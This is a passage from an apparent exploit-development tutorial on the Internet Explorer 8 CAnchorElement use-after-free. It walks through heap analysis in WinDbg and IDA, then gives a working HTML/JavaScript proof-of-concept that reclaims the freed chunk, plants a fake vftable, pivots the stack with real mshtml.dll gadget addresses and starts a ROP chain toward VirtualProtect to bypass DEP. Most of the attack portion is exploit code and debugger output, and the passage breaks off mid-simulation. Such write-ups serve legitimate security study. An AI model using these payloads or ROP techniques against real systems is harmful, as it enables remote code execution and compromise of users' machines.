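To make the dispatch concrete, this Node.js sketch models a tiny 32-bit address space and performs the same two loads: the vptr from [ecx], then the function pointer from [vptr+0x70]. Everything is simulated: the addresses (`OBJ`, `VTABLE`, `FAKE`, `0x00401234`) are hypothetical, and an unmapped read merely throws a `RangeError` to stand in for an access violation. The second and third cases preview what happens later in this post once the freed object is reclaimed with our own data.

```javascript
// A toy, flat 32-bit "address space": a Map from address to DWORD value.
// This is a simulation only; it does not touch real process memory.
const memory = new Map();

function writeDword(addr, value) {
  memory.set(addr >>> 0, value >>> 0);
}

function readDword(addr) {
  addr >>>= 0;
  if (!memory.has(addr)) {
    // Stands in for an access violation on unmapped or freed memory.
    throw new RangeError("access violation reading 0x" + addr.toString(16));
  }
  return memory.get(addr);
}

// Mirrors the routine at the crash site:
//   mov eax, dword ptr [ecx]       ; load the vptr from the object
//   mov edx, dword ptr [eax+70h]   ; load the function pointer at table + 0x70
//   call edx                       ; (here we just return the target)
function fetchVirtualAt0x70(ecx) {
  const eax = readDword(ecx);
  const edx = readDword(eax + 0x70);
  return edx;
}

const OBJ = 0x00100000;    // hypothetical heap object
const VTABLE = 0x00400000; // hypothetical legitimate vtable
writeDword(OBJ, VTABLE);
writeDword(VTABLE + 0x70, 0x00401234);
console.log(fetchVirtualAt0x70(OBJ).toString(16)); // 401234

// Object memory reclaimed with raw filler: the "vptr" is now 0x41414141.
writeDword(OBJ, 0x41414141);
try {
  fetchVirtualAt0x70(OBJ);
} catch (e) {
  console.log(e.message); // access violation reading 0x414141b1
}

// Object memory reclaimed with a pointer to a fake table we control.
const FAKE = 0x00500000;   // hypothetical fake vtable
writeDword(OBJ, FAKE);
writeDword(FAKE + 0x70, 0x42424242);
console.log(fetchVirtualAt0x70(OBJ).toString(16)); // 42424242
```

Whoever controls the first DWORD of the object controls which table is consulted, and therefore what ends up in EDX.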

Notice how we are getting the same result as our simple program earlier, although the assembly instructions are slightly different? Routines like this are a strong indication that a virtual function is being fetched!

Before moving on, let’s recall a former image.

Notice the state of EAX when the function crashes (right under the Access Violation statement). It holds a recognizable pattern, f0f0f0f0. This is the fill pattern PageHeap (enabled via gflags.exe) uses for a freed allocation, meaning the value in EAX was read from memory that is in a free state. This makes sense, as we are trying to index an object that simply no longer exists!

Rerun the POC, and when the crash occurs let’s execute the following !heap command: !heap -p -a ecx.

Why ECX? As we know, the first thing the routine for fetching a virtual function does is load the vptr into EAX from [ecx]. ECX holds the address of the object itself, which was allocated on the heap, so ECX is a pointer to the heap chunk. Even though that memory is in a free state, ECX still points to it, and the DWORD at [ecx] is where the vptr used to live. It is only when we dereference the memory that we can see the chunk is actually invalid.

Moving on, take a look at the call stack: we can see the function calls that led up to the chunk being freed. In the !heap command, -p requests PageHeap information, and -a displays the details of the heap block containing the given address (including, with PageHeap enabled, the stack trace that led to the free). On Windows, when you invoke something such as a C Runtime function like free, it will eventually hand off execution to a Windows API. Knowing this, we know that the “lowest level” (i.e. last) function call within a module to anything that resembles the word “free” or “destructor” is responsible for the freeing. For instance, if we have an executable named vuln.exe that calls free from MSVCRT (the Microsoft C Runtime library), execution will eventually be handed off to KERNELBASE!HeapFree or kernel32!HeapFree, depending on what system you are on. The goal now is to identify such behavior and to determine which class is actually handling the free that releases the object (note this doesn’t necessarily mean this is the “vulnerable piece of code”, it just means this is where the free occurs).

Note that when analyzing call stacks in WinDbg (a call stack is simply the list of function calls that led to where execution currently resides), the bottom function is where execution started and the top is where execution currently is. Analyzing the call stack, we can see that the last call before kernel32 or ntdll is hit comes from the mshtml library, in the CAnchorElement class. From this class, we can see the destructor is what kicks off the freeing. This is why the vulnerability name contains the words CAnchorElement Use-After-Free!
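The rule of thumb above (walk down from the top of the stack past the system and runtime frames until you reach the first frame in the module of interest) can be written as a tiny JavaScript helper. The frames below are a made-up stack for a hypothetical `vuln.exe`, not real WinDbg output, and the set of "plumbing" modules is an assumption you would adjust per target.

```javascript
// Modules treated as plumbing between the caller and the actual free.
// This list is an assumption for the example, not an exhaustive rule.
const SYSTEM_MODULES = new Set(["ntdll", "kernel32", "kernelbase", "msvcrt"]);

// frames[0] is the top of the stack (where execution currently is),
// matching the order in which WinDbg prints a call stack.
function findFreeingFrame(frames) {
  for (const frame of frames) {
    const module = frame.split("!")[0].toLowerCase();
    if (!SYSTEM_MODULES.has(module)) {
      return frame; // first frame outside the system/runtime modules
    }
  }
  return null; // every frame belonged to a system module
}

// Hypothetical stack for an executable whose module name is "vuln".
const frames = [
  "ntdll!RtlFreeHeap",
  "KERNELBASE!HeapFree",
  "msvcrt!free",
  "vuln!Widget::~Widget",
  "vuln!main",
];

console.log(findFreeingFrame(frames)); // vuln!Widget::~Widget
```

In the real trace for this bug, the equivalent frame is the CAnchorElement destructor in mshtml.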

Awesome, we know what is causing the object to be freed! Per our earlier conversation about our overarching exploitation strategy, we would like to try to fill the invalid memory with data we control! However, we also talked about the heap on Windows, and how different structures are responsible for determining which heap chunk is used to service an allocation. This heavily depends on the size of the allocation.

In order to fill the freed chunk with our own data, we first need to determine the size of the object being freed. That way, when we allocate our memory, it will hopefully be used to fill the freed slot, since we are giving the browser an allocation request of exactly the same size as a chunk that is currently free (recall how the heap tries to reuse existing freed chunks of a matching size to service new requests).
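The reclaim idea can be illustrated with a deliberately simplified allocator model in JavaScript. This is not how the Windows 7 heap or the LFH is implemented internally; it only assumes the two properties this post relies on: freed chunks are tracked per allocation size, and a same-size request reuses the most recently freed chunk first. The `ToyHeap` class and its addresses are hypothetical.

```javascript
// Deliberately simplified model: one LIFO free list per allocation size.
// This is NOT the Windows heap implementation, only an illustration of the reuse pattern.
class ToyHeap {
  constructor(base) {
    this.next = base;           // next never-used address
    this.freeLists = new Map(); // size -> stack of freed addresses
  }

  alloc(size) {
    const list = this.freeLists.get(size);
    if (list && list.length > 0) {
      return list.pop();        // reuse the most recently freed chunk of exactly this size
    }
    const addr = this.next;
    this.next += size;
    return addr;
  }

  free(addr, size) {
    if (!this.freeLists.has(size)) {
      this.freeLists.set(size, []);
    }
    this.freeLists.get(size).push(addr);
  }
}

const heap = new ToyHeap(0x1000);

const anchor = heap.alloc(0x68);    // stands in for the 0x68-byte CAnchorElement
heap.free(anchor, 0x68);            // the destructor frees it; a stale pointer still refers to it

const wrongSize = heap.alloc(0x40); // a different size is served from elsewhere
const sameSize = heap.alloc(0x68);  // an exact-size request lands in the freed slot

console.log(wrongSize === anchor);  // false
console.log(sameSize === anchor);   // true

// LIFO: when two same-size chunks are freed, the last one freed is handed out first.
const first = heap.alloc(0x68);
const second = heap.alloc(0x68);
heap.free(first, 0x68);
heap.free(second, 0x68);
const reused = heap.alloc(0x68);
console.log(reused === second);     // true
```

In this model, getting the size exactly right is what decides whether our data overlaps the stale object, which is why the next step is recovering the allocation size.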

Let’s step into IDA for a moment to reverse engineer exactly how big this chunk is, so that we can fill this freed chunk with our own data.

We know that the freeing mechanism is the destructor for the CAnchorElement class. Let’s search for that in IDA. To do this, download IDA Freeware for Windows on a second Windows machine that is 64-bit, and preferably Windows 10. Then, take mshtml.dll, which is found in C:\Windows\system32 on the Windows 7 exploit development machine, copy it over to the Windows machine with IDA on it, and load it. Note that there may be issues with getting the proper symbols in IDA, since this is an older DLL from Windows 7. If that is the case, I suggest looking at PDB Downloader to quickly obtain the symbols locally, and import the .pdb files manually.

Now, let’s search for the destructor. We can simply search for the class CAnchorElement and look for any functions that contain the word destructor.

As we can see, we found the destructor! According to the previous stack trace, this destructor should make a call to HeapFree, which actually does the freeing. We can see that this is the case after disassembling the function in IDA.

Querying the Microsoft documentation for HeapFree, we can see it takes three arguments: 1. A handle to the heap where the chunk of memory will be freed, 2. Flags for freeing, and 3. A pointer to the actual chunk of memory to be freed.

At this point you may be wondering, “none of those parameters are the size”. That is correct! However, we now see that the address of the chunk that is going to be freed will be the third parameter passed to the HeapFree call. Note that since we are on a 32-bit system and HeapFree uses the __stdcall calling convention, function arguments are passed on the stack, pushed from right to left, so the chunk pointer is the first argument pushed before the call.

Take one more look at the prototype of the previous image. Notice the destructor accepts an argument for an object of type CAnchorElement. This makes sense, as this is the destructor for an object instantiated from the CAnchorElement class. This also means, however, there must be a constructor that is capable of creating said object as well! And as the destructor invokes HeapFree, the constructor will most likely either invoke malloc or HeapAlloc! We know that the last argument for the HeapFree call in the destructor is the address of the actual chunk to be freed. This means that a chunk needs to be allocated in the first place. Searching again through the functions in IDA, there is a function located within the CAnchorElement class called CreateElement, which is very indicative of a CAnchorElement object constructor! Let’s take a look at this in IDA.

Great, we see that there is in fact a call to HeapAlloc. Let’s refer to the Microsoft documentation for this function.

The first parameter is, again, a handle to an existing heap. The second is a set of flags for the allocation. The third, and most important for us, is the size of the allocation in bytes. This tells us that when a CAnchorElement object is created, it will be 0x68 bytes in size. If we open up our POC again in Internet Explorer, letting the postmortem debugger take over again, we can actually see that the free from the vulnerability is for a heap chunk 0x68 bytes in size, just as our reverse engineering of the CAnchorElement::CreateElement function showed!


This proves our hypothesis, and now we can start editing our script to see whether we can control this allocation. Before proceeding, let’s disable PageHeap for IE8.

Now with that done, let’s update our POC with the following code.

The above POC starts out again with the trigger, to create the use-after-free condition. After the use-after-free is triggered, we create a string of 104 bytes, which is 0x68 bytes, the size of the freed allocation. This by itself doesn’t result in any memory being allocated on the heap. However, as Corelan points out, it is possible to create an arbitrary DOM element and set one of its properties to the string. This action will actually result in an allocation of the string’s size on the heap!

Let’s run the new POC and see what result we get, leveraging WinDbg once again as a postmortem debugger.

Interesting! This time we are attempting to dereference the address 0x41414141, instead of getting the seemingly arbitrary crash we saw at the beginning of this blog when triggering the original POC without PageHeap enabled! The reason for this crash, however, is much different! Recall that the heap chunk causing the issue is in ECX, just like we have previously seen. However, this time, instead of seeing freed memory, we can see that our user-controlled data now occupies the heap chunk!

Now that we have finally figured out how we can control the data in the previously freed chunk, we can bring everything in this tutorial full circle. Let’s look at the current program execution.

We know that this is a routine to fetch a virtual function from a virtual function table. The first instruction, mov eax, dword ptr [ecx], takes the virtual function table pointer, also known as the vptr, and loads it into the EAX register. From there, the vptr, which points to the virtual function table, is dereferenced at a specified offset and the resulting function is called. Notice that we now control the memory ECX points to, which is where the vptr is read from.

Let’s also take a look at this chunk in context of a HeapBase structure.

As we can see, in the heap our chunk is a part of, the LFH is activated (FrontEndHeapType of 0x2 means the LFH is in use). As mentioned earlier, this will allow us to easily fill in the freed memory with our own data, as we have just seen in the images above. Remember that the LFH is also LIFO, like the stack, on Windows 7. The last deallocated chunk is the first allocated chunk in the next request. This has proven useful, as we were able to find out the correct size for this allocation and service it.

This means that we own the 4 bytes that were previously used to hold the vptr. Let’s think now: what if it were possible to construct our own fake virtual function table, large enough to hold an entry at offset 0x70? With our primitive to control the vptr, we could replace the vptr with a pointer to our own “virtual function table”, which we could allocate somewhere in memory. We could fill that table with pointers (think of them as “fake functions”), 0x70 / 4 = 28 DWORDs leading up to the entry at offset 0x70, and then have the vptr we control point to it.

By program design, execution would then naturally dereference our fake virtual function table, fetch whatever is stored at offset 0x70, and invoke it! The goal from here is to construct our own vftable and make the entry at offset 0x70 a pointer that kicks off a ROP chain we have constructed in memory, which will then bypass DEP and give us a shell!

We know now that we can fill our freed allocation with our own data. Instead of just using DOM elements, we will use a technique for precise reallocation with HTML+TIME, as described by Exodus Intelligence. I opted for this method simply to avoid heap spraying, which is not the focus of this post. The focus here is to understand use-after-free vulnerabilities and JavaScript’s behavior. Note that on more modern systems, where primitives such as this no longer exist, reallocating and reclaiming freed memory is exactly what makes use-after-frees more difficult to exploit. It may require additional reverse engineering to find objects of a suitable size, etc.

Essentially, instead of just placing 0x68 bytes of raw data into the freed chunk (which still results in a crash, because we are not supplying pointers to anything), this HTML+TIME “method”, which only works on IE8, lets us create an array of pointers that we control, 0x68 bytes in total. This way, we can force program execution to actually call something meaningful (like our fake virtual table!).

Take a look at our updated POC.

Again, the Exodus blog goes into detail, but essentially we are able to leverage SMIL (Synchronized Multimedia Integration Language) to create 0x68 bytes’ worth of pointers instead of just 0x68 bytes of data, which is much more useful and allows us to construct a fake virtual function table.
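As a quick sanity check on the numbers, this Node.js sketch rebuilds the shape of the semicolon-separated `values` string used in the POC (a placeholder string stands in for the real fake vftable) and counts the entries it produces. It assumes, per the description above, that each entry becomes one 4-byte pointer in the reclaimed chunk on 32-bit IE8; the placeholder text `FAKE_VFTABLE` is hypothetical.

```javascript
// Placeholder for the first entry; in the POC this is the fake vftable string.
// It must not contain ';', or it would be split into additional entries.
let values = "FAKE_VFTABLE";

// Same loop shape as the POC: 25 more entries, each introduced by a semicolon.
for (let i = 0; i < 25; i++) {
  values += ";vftable";
}

const entries = values.split(";");
const POINTER_SIZE = 4; // bytes per pointer on 32-bit IE8

console.log(entries.length);                                      // 26
console.log("0x" + (entries.length * POINTER_SIZE).toString(16)); // 0x68
```

26 entries of 4 bytes each gives exactly the 0x68 bytes of the freed CAnchorElement chunk.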

Note that heap spraying is an alternative, although it is often scrutinized. The point of this exploit is to document use-after-free vulnerabilities, how to determine the size of a freed allocation, and how to properly fill it. This specific technique is also no longer applicable today. However, this is the beginning of my journey learning browser exploitation, and I want to start with the basics.

Let’s now run the POC again and see what happens.

Great news, we control the instruction pointer! Let’s examine how we got here. Recall that we are executing code within the same CElement::Doc routine as before, where a virtual function is fetched from a vftable. Take a look at the image below.

Let’s start with the top. As we can see, EIP is now set to our user-controlled data. The value in ECX, as has been true throughout this routine, contains the address of the heap chunk that has been the culprit of the vulnerability. We have now reclaimed this freed chunk with our user-supplied 0x68-byte allocation.

As we know, this heap chunk in ECX, when dereferenced, contains the vptr, or in our case, the fake vptr. Notice how the first value at ECX, and every value after it, is 004.... These are the pointers from the array the HTML+TIME method created! If we dereference the first member, it is a pointer to our fake vftable! This is great, as the value in ECX is dereferenced to fetch our fake vptr (one of the pointers from the HTML+TIME method). This then points to our fake virtual function table, and we have set the entry at offset 0x70 to 42424242 to prove control over the instruction pointer. Just to reiterate one more time, the assembly for fetching a virtual function is as follows:

mov eax, dword ptr [ecx] 	 ; This gets the vptr into EAX, from the value pointed to by ECX
mov edx, dword ptr [eax+0x70]	 ; EAX holds the vptr (the address of the vftable); load the function pointer stored at vftable + 0x70 into EDX
call edx 			 ; The function is called

So what happened here is that ECX still held the address of the freed chunk, which our own heap chunk has now replaced. Our heap chunk is 0x68 bytes and consists of nothing but pointers: to the fake virtual function table (the 1st pointer) or to the string vftable (the 2nd pointer and so on). This can be seen in the image below (in WinDbg, poi() dereferences the address within the parentheses and displays the result).

The first DWORD at ECX, which is a pointer to our fake vtable, is placed in EAX.

The value in EAX, at an offset of 0x70 is then placed into the EDX register. This value is then called.

As we can see, this is 42424242, which is the target function from our fake vftable! We have now successfully created our exploit primitive, and we can begin with a ROP chain, where we can exchange the EAX and ESP registers, since we control EAX, to obtain stack control and create a ROP chain.

I Mean, Come On, Did You Expect Me To Skip A Chance To Write My Own ROP Chain?

First off, before we start, it is well known IE8 contains some modules that do not depend on ASLR. For these purposes, this exploit will not take into consideration ASLR, but I hope that true ASLR bypasses through information leaks are something that I can take advantage of in the future, and I would love to document those findings in a blog post. However, for now, we must learn to walk before we can run. At the current state, I am just learning about browser exploitation, and I am not there yet. However, I hope to be soon!

It is a well-known fact that when the Java Runtime Environment, version 1.6 to be specific, is in use, an older version of MSVCR71.dll gets loaded into Internet Explorer 8, and this DLL is not compiled with ASLR. We could just leverage this DLL for our purposes. However, since there is already much documentation on this, we will go ahead and just disable ASLR system-wide and construct our own ROP chain, to bypass DEP, with another library that doesn’t have an “automated ROP chain”. Note again, this is the first post in a series where I hope to make things increasingly modern. However, I am in my infancy in regards to learning browser exploitation, so we are going to start off by walking instead of running. This article describes how you can disable ASLR system-wide.

Great. From here, we can leverage the rp++ utility to enumerate ROP gadgets for a given DLL. Let’s search in mshtml.dll, as we are already familiar with it!

To start, we know that our fake virtual function table is in EAX. We are not limited to a certain size here, as this table is pointed to by the first of 26 DWORDS (for a total of 0x68, or 104 bytes) that fills up the freed heap chunk. Because of this, we can exchange the EAX register (which we control) with the ESP register. This will give us stack control and allow us to start forging a ROP chain.

Parsing the ROP gadget output from rp++, we can see that a nice ROP gadget exists.

Let’s update our POC with this ROP gadget, in place of the former 42424242 DWORD that served as our fake virtual function.

<!DOCTYPE html>
<HTML XMLNS:t ="urn:schemas-microsoft-com:time">
<meta><?IMPORT namespace="t" implementation="#default#time2"></meta>

<script>
    window.onload = function() {

      // Create the fake vftable: 1 DWORD at offset 0 plus 0x70/4 (28) more DWORDs, so the last entry sits at offset 0x70
      vftable = "\u4141\u4141";

      for (i=0; i < 0x70/4; i++) {
        // This is where execution will reach when the fake vtable is indexed, because the use-after-free vulnerability is the result of a virtual function being fetched at [eax+0x70]
        // which is now controlled by our own chunk
        if (i == 0x70/4-1) {
          vftable+= unescape("\ua1ea\u74c7");     // xchg eax, esp ; ret (74c7a1ea) (mshtml.dll) Get control of the stack
        } else {
          vftable+= unescape("\u4141\u4141");
        }
      }

      // This creates an array of strings that get pointers created to them by the values property of t:ANIMATECOLOR (so technically these will become an array of pointers to strings)
      // Just make sure that the strings are semicolon separated (the first element, which is our fake vftable, doesn't need to be prepended with a semicolon)
      // The first pointer in this array of pointers is a pointer to the fake vftable, constructed with the above for loop. Each ";vftable" string is appended after the longer fake vftable, which becomes the first pointer/DWORD
      for (i=0; i<25; i++) {
        vftable += ";vftable";
      }

      // Trigger the UAF
      var x  = document.getElementById("a");
      x.outerText = "";

      // Create a string that will eventually have 104 bytes
      var fillAlloc = "\u4141\u4141";

      // Strings in JavaScript are UTF-16: each \uXXXX escape is one 2-byte code unit (\u4141 is stored as the bytes 41 41)
      // Each string is also terminated with a NULL character
      // We already have 4 bytes from the fillAlloc definition. Append 24 more DWORDs (96 bytes), 1 DWORD (4 bytes) at a time, compensating for the terminating NULL
      for (i=0; i < 100/4-1; i++) {
        fillAlloc += "\u4242\u4242";
      }

      // Create an arbitrary DOM element
      // Setting one of its properties to the payload allocates the string on the heap
      var newElement = document.createElement('img');
      newElement.title = fillAlloc;

      try {
        a = document.getElementById('anim');
        a.values = vftable;
      }
      catch (e) {};
    }
</script>

            <q id='a'>
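Because the fake vftable is built out of `\uXXXX` pairs, it helps to see exactly how a 32-bit address turns into two UTF-16 code units and where each DWORD ends up. The sketch below is a Node.js check, not IE8 code; `dwordToString` and `dwordAt` are hypothetical helper names. It relies on JavaScript strings being UTF-16, so each code unit occupies two bytes and, on little-endian x86, the low half of the address must come first.

```javascript
// Encode a 32-bit value as two UTF-16 code units, low half first, so that the
// bytes in memory read back as the original little-endian DWORD.
function dwordToString(value) {
  const low = value & 0xffff;
  const high = (value >>> 16) & 0xffff;
  return String.fromCharCode(low, high);
}

// Read back the DWORD stored at a given byte offset of such a string.
function dwordAt(str, byteOffset) {
  const i = byteOffset / 2; // each code unit is 2 bytes
  return (str.charCodeAt(i) | (str.charCodeAt(i + 1) << 16)) >>> 0;
}

// Same construction as the POC: one DWORD at offset 0, then 0x70/4 more DWORDs.
let vftable = dwordToString(0x41414141);
for (let i = 0; i < 0x70 / 4; i++) {
  vftable += (i === 0x70 / 4 - 1) ? dwordToString(0x74c7a1ea) : dwordToString(0x41414141);
}

console.log(dwordToString(0x74c7a1ea) === "\ua1ea\u74c7"); // true
console.log("0x" + (vftable.length * 2).toString(16));      // 0x74
console.log("0x" + dwordAt(vftable, 0x70).toString(16));    // 0x74c7a1ea
```

So the table built by the POC is 0x74 bytes (29 DWORDs), and the stack pivot gadget sits exactly at offset 0x70, where the vulnerable routine reads it.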

Let’s (for now) leave WinDbg configured as our postmortem debugger, and see what happens. Running the POC, we can see that the crash ensues, and the instruction pointer is pointing to 41414141.

Great! We can see that we have gained control of the stack by making our virtual function point to a ROP gadget that exchanges EAX and ESP! Recall what was said earlier about our fake vftable. Right now, this table is only 0x74 bytes in size (its last entry sits at offset 0x70), because we know our vftable from earlier indexed a function at offset 0x70. This doesn’t mean, however, that we are limited to that size. The only limitation we have is how much memory we can allocate to fill the chunk. Remember, this vftable is pointed to by a DWORD, created from the HTML+TIME method to allocate 26 total DWORDS, for a total of 0x68 bytes, or 104 bytes in decimal, which is what we need in order to control the freed allocation.

Knowing this, let’s add some “ROP” gadgets into our POC to outline this concept.

// Create the fake vftable: 1 DWORD at offset 0 plus 0x70/4 (28) more DWORDs, so the last entry sits at offset 0x70
vftable = "\u4141\u4141";

for (i=0; i < 0x70/4; i++) {
  // This is where execution will reach when the fake vtable is indexed, because the use-after-free vulnerability is the result of a virtual function being fetched at [eax+0x70]
  // which is now controlled by our own chunk
  if (i == 0x70/4-1) {
    vftable+= unescape("\ua1ea\u74c7");     // xchg eax, esp ; ret (74c7a1ea) (mshtml.dll) Get control of the stack
  } else {
    vftable+= unescape("\u4141\u4141");
  }
}

// Begin the ROP chain
rop = "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";

// Combine everything
vftable += rop;

Great! We can see that our crash still occurs properly, the instruction pointer is controlled, and we have added to our fake vftable, which is now located on the stack! In terms of exploitation strategy, notice that a pointer to our original xchg eax, esp gadget still remains on the stack. Because of this, we will need to start our ROP chain after this pointer, since it has already been executed. This means that our ROP chain should start where the 43434343 bytes begin, and the 41414141 bytes can remain as padding/a jump further into the fake vftable.

It should be noted that from here on out, I had issues with setting breakpoints in WinDbg on Internet Explorer processes. This is because Internet Explorer spawns many processes, depending on how many tabs you have, and our code, even when opened in the original Internet Explorer tab, will spawn another Internet Explorer process. Because of this, we will continue to use WinDbg as our postmortem debugger for the time being: we make changes to our ROP chain and then view the state of the debugger to see the results. When necessary, we will start the parent Internet Explorer process and then use WinDbg to identify and attach to the correct child process in order to properly analyze our exploit.

We know that we need to change the rest of our fake vftable DWORDS with something that will eventually “jump” over our previously used xchg eax, esp ; ret gadget. To do this, let’s edit how we are constructing our fake vftable.

// Create the fake vftable: 1 DWORD at offset 0 plus 0x70/4 (28) more DWORDs, so the last entry sits at offset 0x70
// Start the table with a ROP gadget that increases ESP (since this fake vftable is now on the stack, we need to jump over its entries to hit our ROP chain)
// Otherwise, the old xchg eax, esp ; ret stack pivot gadget will get re-executed
vftable = "\u07be\u74fb";                   // add esp, 0xC ; ret (74fb07be) (mshtml.dll)

for (i=0; i < 0x70/4; i++) {
  // This is where execution will reach when the fake vtable is indexed, because the use-after-free vulnerability is the result of a virtual function being fetched at [eax+0x70]
  // which is now controlled by our own chunk
  if (i == 0x70/4-1) {
    vftable+= unescape("\ua1ea\u74c7");     // xchg eax, esp ; ret (74c7a1ea) (mshtml.dll) Get control of the stack
  } else if (i == 0x68/4-1) {
    vftable += unescape("\u07be\u74fb");    // add esp, 0xC ; ret (74fb07be) (mshtml.dll) When execution reaches here, jump over the xchg eax, esp ; ret gadget and into the full ROP chain
  } else {
    vftable+= unescape("\u7738\u7503");     // ret (75037738) (mshtml.dll) Keep performing returns to walk up the stack, until the final add esp, 0xC ; ret is hit
  }
}

// ROP chain
rop = "\u9090\u9090"; 					  // Padding for the previous ROP gadget (add esp, 0xC ; ret)

// Our ROP chain begins here
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";

// Combine everything
vftable += rop;

What we know so far, is that this fake vftable will be loaded on the stack. When this happens, our original xchg eax, esp ; ret gadget will still be there, and we will need a way to make sure we don’t execute it again. The way we are going to do this is to replace our 41414141 bytes with several ret opcodes that will lead to an eventual add esp, 0xC ; ret ROP gadget, which will jump over the xchg eax, esp ; ret gadget and into our final ROP chain!
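To double-check that the `ret` sled and the second `add esp, 0xC ; ret` really skip the old pivot, here is a small JavaScript model of the stack right after `xchg eax, esp ; ret`. It uses gadget labels instead of addresses, models only the three behaviors present in this table (`ret`, `add esp, 0xC ; ret`, and the pivot), and assumes ESP equals the base of the fake vftable immediately after the pivot. The `walk` helper and the labels are hypothetical.

```javascript
// Rebuild the fake vftable from the POC as labels instead of addresses.
const stack = ["ADD_ESP_C_RET"];                            // offset 0x00
for (let i = 0; i < 0x70 / 4; i++) {
  if (i === 0x70 / 4 - 1) stack.push("XCHG_EAX_ESP_RET");   // offset 0x70
  else if (i === 0x68 / 4 - 1) stack.push("ADD_ESP_C_RET"); // offset 0x68
  else stack.push("RET");                                   // ret sled
}
stack.push("PAD_9090");  // offset 0x74, skipped by the second add esp, 0xC
stack.push("ROP_START"); // offset 0x78, the first 43434343 DWORD

// Start right after "xchg eax, esp": ESP is the table base and the pivot's ret runs next.
function walk(stack) {
  let esp = 0;
  const executed = [];
  const pop = () => {
    const value = stack[esp / 4];
    esp += 4;
    return value;
  };

  let eip = pop(); // the pivot's own ret
  while (eip !== "ROP_START") {
    executed.push(eip);
    if (eip === "RET") {
      eip = pop();
    } else if (eip === "ADD_ESP_C_RET") {
      esp += 0xC;
      eip = pop();
    } else {
      // Reaching the pivot again (or running off the table) would be a layout bug.
      throw new Error("unexpected " + eip + " at offset 0x" + (esp - 4).toString(16));
    }
  }
  return { executed, ropStart: esp - 4 };
}

const result = walk(stack);
console.log(result.executed.includes("XCHG_EAX_ESP_RET")); // false
console.log(result.executed.length);                       // 24
console.log("0x" + result.ropStart.toString(16));          // 0x78
```

The first `add esp, 0xC` lands in the middle of the ret sled, the sled carries ESP up to offset 0x68, and the second `add esp, 0xC` hops over the `ret` at 0x6C, the pivot at 0x70 and the padding at 0x74.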

Rerunning the new POC shows us that program execution has skipped over the virtual function table and into our ROP chain! I will walk through the ROP chain, but from here on out there is nothing special about this exploit. As my previous blogs have outlined, constructing a ROP chain works the same way at this point. For getting started with ROP, please refer to these posts. This post will just walk through the ROP chain constructed for this exploit.

The first of the 8 43434343 DWORDS is in ESP, with the other 7 DWORDS located on the stack.

This is great news. From here, we just have a simple task of developing a 32-bit ROP chain! The first step is to get a stack address loaded into a register, so we can use it for RVA calculations. Note that although the stack changes addresses between each instance of a process (usually), this is not a result of ASLR, this is just a result of memory management.

Looking through mshtml.dll, we can see there are two great candidates for getting a stack address into EAX and ECX.

push esp ; pop eax ; ret

mov ecx, eax ; call edx

Notice, however, that the mov ecx, eax instruction ends in a call. We will first pop a gadget that “returns to the stack” into EDX. When the call occurs, a return address is pushed onto the stack. To compensate for this, and so program execution doesn’t execute this return address, we simply add to ESP to essentially “jump over” the return address. Here is what this block of the ROP chain looks like.

// Our ROP chain begins here
rop += "\ud937\u74e7";                     // push esp ; pop eax ; ret (74e7d937) (mshtml.dll) Get a stack address into a controllable register
rop += "\u9d55\u74c2";                     // pop edx ; ret (74c29d55) (mshtml.dll) Prepare EDX for COP gadget
rop += "\u07be\u74fb";                     // add esp, 0xC ; ret (74fb07be) (mshtml.dll) Return back to the stack and jump over the return address from the previous COP gadget
rop += "\udfbc\u74db";                     // mov ecx, eax ; call edx (74dbdfbc) (mshtml.dll) Place EAX, which contains a stack address, into ECX
rop += "\u9090\u9090";                     // Padding to compensate for previous COP gadget
rop += "\u9090\u9090";                     // Padding to compensate for previous COP gadget
rop += "\u9365\u750c";                     // add esp, 0x18 ; pop ebp ; ret (750c9365) (mshtml.dll) Jump over parameter placeholders into ROP chain

// Parameter placeholders
// The Import Address Table of mshtml.dll has a direct pointer to VirtualProtect 
// 74c21308  77e250ab kernel32!VirtualProtectStub
rop += "\u1308\u74c2";                     // kernel32!VirtualProtectStub IAT pointer
rop += "\u1111\u1111";                     // Fake return address placeholder
rop += "\u2222\u2222";                     // lpAddress (Shellcode address)
rop += "\u3333\u3333";                     // dwSize (Size of shellcode)
rop += "\u4444\u4444";                     // flNewProtect (PAGE_EXECUTE_READWRITE, 0x40)
rop += "\u5555\u5555";                     // lpflOldProtect (Any writable page)

// Arbitrary write gadgets to change placeholders to valid function arguments
rop += "\u9090\u9090";                     // Compensate for pop ebp instruction from gadget that "jumps" over parameter placeholders
rop += "\u9090\u9090";                     // Start ROP chain
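The call/`add esp` bookkeeping in this block can be checked with a small JavaScript model of the stack. It replaces real addresses with labels, implements only the five gadget behaviors named in the comments above, and starts with ESP at the first gadget of this block; the labels and the `run` helper are hypothetical. Note how `call edx` writes its return address over the slot that was just consumed, which is why exactly 0xC bytes (the return address plus two padding DWORDs) are skipped.

```javascript
// Stack image for this part of the chain (index * 4 = offset from the block's start).
const stack = [
  "PUSH_ESP_POP_EAX_RET",   // 0x00
  "POP_EDX_RET",            // 0x04
  "ADD_ESP_C_RET",          // 0x08  value popped into EDX
  "MOV_ECX_EAX_CALL_EDX",   // 0x0C
  "PAD", "PAD",             // 0x10, 0x14
  "ADD_ESP_18_POP_EBP_RET", // 0x18
  "VP_IAT_PTR", "RET_PH", "ARG1_PH", "ARG2_PH", "ARG3_PH", "ARG4_PH", // 0x1C to 0x30
  "PAD_EBP",                // 0x34  popped into EBP
  "CHAIN_CONTINUES",        // 0x38
];

function run(stack) {
  const regs = { eax: 0, ecx: 0, edx: null, ebp: null };
  let esp = 0;
  const pop = () => {
    const value = stack[esp / 4];
    esp += 4;
    return value;
  };

  let eip = pop(); // the previous gadget's ret lands on the first entry
  while (eip !== "CHAIN_CONTINUES") {
    switch (eip) {
      case "PUSH_ESP_POP_EAX_RET":
        regs.eax = esp; // push esp ; pop eax leaves the current ESP in EAX
        eip = pop();
        break;
      case "POP_EDX_RET":
        regs.edx = pop();
        eip = pop();
        break;
      case "MOV_ECX_EAX_CALL_EDX":
        regs.ecx = regs.eax;
        esp -= 4;                          // call pushes its return address...
        stack[esp / 4] = "RETURN_ADDRESS"; // ...over the slot that was just consumed
        eip = regs.edx;
        break;
      case "ADD_ESP_C_RET":
        esp += 0xC;
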